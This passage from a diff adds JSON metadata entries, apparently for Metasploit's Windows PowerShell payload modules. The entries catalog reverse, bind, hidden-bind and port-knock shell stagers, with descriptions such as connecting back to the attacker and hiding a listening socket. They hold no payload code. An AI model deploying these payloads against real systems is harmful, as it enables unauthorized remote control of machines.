PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/pingback_bind_tcp": { + "name": "Powershell Exec, Windows x86 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/pingback_reverse_tcp": { + "name": "Powershell Exec, Windows x86 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_bind_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_reverse_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/powershell_reverse_tcp_ssl": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/powershell/shell/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_hidden_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/bind_named_pipe": { + "name": "Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/shell/bind_nonx_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/shell/bind_tcp_rc4": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/shell/bind_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/find_tag": { + "name": "Powershell Exec, Windows Command Shell, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/find_tag", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/shell/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_ord_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_allports": { + "name": "Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_dns": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + 